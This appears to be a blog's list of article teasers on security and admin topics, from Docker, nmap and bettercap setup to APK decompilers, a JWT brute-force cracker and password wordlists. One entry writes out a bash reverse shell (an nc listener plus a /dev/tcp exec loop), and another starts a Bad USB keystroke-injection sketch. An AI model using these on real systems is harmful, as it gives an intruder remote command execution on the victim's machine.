Ubuntu Hotspote
Step 0 base on: https://www.youtube.com/watch?v=Rh-NiRSn6rs goto: Network Connection (Edit Connection) Step 1 Step 2 Step 3 Step 4 Step 5 edit configuration file:...
View ArticleBad USB Demo (windows)
#include "Keyboard.h" void typeKey(int key) { Keyboard.press(key); delay(50); Keyboard.release(key); } void setup() { Keyboard.begin(); delay(500); delay(400); Keyboard.press(KEY_LEFT_GUI);...
View ArticleAPK Decompilers
https://ibotpeaches.github.io/Apktool/ https://ibotpeaches.github.io/Apktool/install/ https://www.jetbrains.com/decompiler/
View ArticleNmap latest version on Ubuntu
https://nmap.org/book/inst-linux.html https://nmap.org/download.html Steps for converting Nmap RPM files to Debian/Ubuntu deb format for installation on Debian/Ubuntu If you don’t have the alien...
View Articlebettercap on ubuntu 14.04.5 LTS
upgrade to Ruby sudo apt-add-repository ppa:brightbox/ruby-ng sudo apt-get update sudo apt-get install ruby2.3 ruby2.3-dev install bettercap gem install bettercap gem update bettercap sudo bettercap...
View ArticleQuickly create a large file on a Linux system.
fallocate -l 1K file_1K.txt fallocate -l 2K file_2K.txt fallocate -l 5K file_5K.txt fallocate -l 10M file_10M.txt fallocate -l 20M file_20M.txt fallocate -l 50M file_50M.txt fallocate -l 100M...
View ArticleJWT HS256
https://jwt.io/ https://github.com/brendan-rius/c-jwt-cracker 2s pic.twitter.com/poGF3lJO6Y — Michał Szałkowski (@Sza1ek) August 7, 2017 jwt-cracker – Simple HS256 JWT Token Brute Force Cracker...
View Articleskipfish
Install skipfish sudo apt-get update sudo apt-get install skipfish https://code.google.com/archive/p/skipfish/
View ArticleReverse Engineering
Reverse Engineering Malware https://www.hackers-arise.com/reverse-engineering-malware...
View ArticleReverse Engineering 2
#include <stdio.h> int main() { printf("Lorem"); return 0; } gcc -w example1.c -o example1 objdump -D example1 > example1.source 00000000004005d0 <_IO_stdin_used>: 4005d0: 01 00 add...
View ArticleReverse Engineering – Detect It Easy
https://github.com/horsicq/Detect-It-Easy http://ntinfo.biz/
View ArticleWebGoat and docker
Install docker https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubuntu-16-04 Install webgoat-7.1 https://hub.docker.com/r/webgoat/webgoat-7.1/ run docker run -p...
View ArticlePasswords
https://github.com/danielmiessler/SecLists/tree/master/Passwords https://wiki.skullsecurity.org/index.php?title=Passwords https://dazzlepod.com/site_media/txt/passwords.txt
View ArticleReverse shell bash
our server nc -l -p 8085 -vvv target server exec 5<>/dev/tcp/???.???.??.???/8085 cat <&5 | while read line; do $line 2>&5 >&5; done
View ArticleAT&T syntax and Intel syntax
#include <stdio.h> int main() { int i; for(i=0; i < 10; i++) { puts("Hello, world!\n"); } return 0; } objdump -M firstprog | grep -A15 main.: > main_dump_att.txt 000000000040052d...
View ArticleUseragent string
http://www.useragentstring.com/ http://www.useragentstring.com/pages/useragentstring.php http://www.useragentstring.com/pages/useragentstring.php?name=All...
View ArticleDocker mariadb & wordpress
https://hub.docker.com/_/mariadb/ https://hub.docker.com/_/wordpress/ docker pull mariadb:10.0.25 docker pull wordpress:4.6.1-php7.0-apache docker run --name mariadb -d -v...
View ArticleDocker postgres & wildfly
JEE Project – http://www.blog.btbw.pl/java/jee-and-flywaydb-wildfly-10-1-0-final/ – https://github.com/szalek/JEE-Hibernate-Deltaspike-Flywaydb All files for this Example you can find on github –...
View ArticleDocker postgres & populate data
Build custom image Dockerfile FROM postgres:9.6.5 ENV POSTGRES_USER docker ENV POSTGRES_PASSWORD docker ENV POSTGRES_DB docker ADD init.sql /docker-entrypoint-initdb.d/ init.sql -- CREATE USER docker;...
View Article